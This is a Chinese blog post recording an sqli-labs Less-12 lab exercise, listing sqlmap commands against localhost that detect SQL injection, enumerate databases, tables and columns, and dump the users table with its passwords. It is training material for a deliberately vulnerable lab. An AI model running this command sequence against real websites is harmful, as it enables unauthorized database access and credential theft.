sqli-labs-Less-12自动化注入方法

sqli-labs 实验记录

Less-12

第一步:进行sqli注入漏洞检测

输入命令:

复制代码
sqlmap -u http://localhost/Less-12/?id=1 --batch --forms

--batch 表示采用默认参数。
--forms 表示自动提交表单。

查询结果如图所示:存在注入漏洞,注入类型分别为:boolean-based blind, error-based,time-based blind, union query; 并给出了相应的payload。

第二步:查询服务器中的所有数据库

输入命令:

复制代码
sqlmap -u http://localhost/Less-12/?id=1 --batch --forms --dbs

--dbs 表示查询数据库。

查询结果如图所示:数据库共有两个,分别为information_schema, security。

第三步:查询指定数据库中的所有表

输入命令:

复制代码
sqlmap -u http://localhost/Less-12/?id=1 --batch --forms -D security --tables

-D security 表示指定查询数据库security;
--tables 表示查询数据库中的所有表。

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

输入命令:

复制代码
sqlmap -u http://localhost/Less-12/?id=1 --batch --forms -D security -T users --columns

-T users 表示指定查询数据表users;
--columns 表示查询数据表中的所有列。

查询结果如图所示:数据列共有3个,分别是id, password, username。

第五步:查询指定数据表中的具体信息

输入命令:

复制代码
sqlmap -u http://localhost/Less-12/?id=1 --batch --forms -D security -T users --dump

--dump 表示查询数据表中的具体信息

查询结果如图所示:数据表users中的具体信息共有13条。

相关推荐
wefg14 分钟前
【MySQL】事务
数据库·mysql
黑白极客12 分钟前
mysql的高可用性
数据库·mysql
云飞云共享云桌面2 小时前
单机建模卡顿运维繁琐!中小型机械制造厂云飞云 3D 云桌面落地
运维·服务器·网络·3d·自动化·电脑·负载均衡
heimeiyingwang3 小时前
【架构实战】MySQL索引优化:从慢查询到毫秒响应
数据库·mysql·架构
学逆向的3 小时前
汇编——数据存储模式
开发语言·汇编·网络安全
zandy10113 小时前
体验家 XMPlus 批量操作与自动化工作流引擎:让大规模运营从手动执行走向规则驱动
大数据·运维·自动化
渣渣灰飞4 小时前
MySQL 系统学习 第二阶段 第四章:DCL(Data Control Language)第二节:权限管理与角色(Role)
数据库·学习·mysql
宠友信息5 小时前
多端即时通讯源码技术实践,Redis路由、MySQL持久化与Socket接入
spring boot·websocket·mysql·uni-app
渣渣灰飞5 小时前
MySQL 系统学习 第四阶段:MySQL 高级 第一节:索引(Index)
数据库·学习·mysql
阿米亚波6 小时前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发